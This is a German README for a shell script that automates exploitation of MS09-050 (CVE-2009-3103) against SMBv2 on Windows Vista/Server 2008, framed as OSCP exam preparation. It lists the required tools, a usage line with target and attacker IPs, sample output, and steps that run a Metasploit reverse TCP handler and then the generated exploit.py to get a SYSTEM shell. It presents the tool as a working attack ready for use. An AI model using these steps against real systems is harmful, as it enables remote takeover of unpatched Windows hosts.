
Automatisierter Exploit-Wrapper für MS09-050 (CVE-2009-3103), der SMBv2 auf Windows Vista/Server 2008 angreift. Generiert Shellcode, erstellt den Exploit und erzeugt einen Metasploit-Handler für SYSTEM-Shell-Zugriff.
Einzeiler-Setup für die Ausnutzung von MS09-050 (CVE-2009-3103). Kein Ärger, kein Debugging, funktioniert einfach.
Die meisten MS09-050-Skripte, die herumschwirren, erfordern manuelle Shellcode-Injektion, haben Timing-Probleme mit Handlern oder funktionieren einfach nicht. Dieser Wrapper:
Entwickelt für die OSCP-Vorbereitung, bei der Zeit eine Rolle spielt.
msfvenommsfconsolepython2rpcclient (normalerweise vorinstalliert)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Ausgabe:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
Terminal 1 - Handler starten:
msfconsole -q -r handler.rc
Warten auf: Started reverse TCP handler on ...
Terminal 2 - Exploit ausführen:
python2 exploit.py 192.168.233.40
Überprüfen Sie Terminal 1 auf Ihre Shell.
windows/shell/reverse_tcp) - funktioniert zuverlässig mit dem Stager in diesem ExploitOriginal-Exploit basierend auf ohnozzy's MS09-050 PoC.
MIT - Mach was du willst, sei nur nicht böse.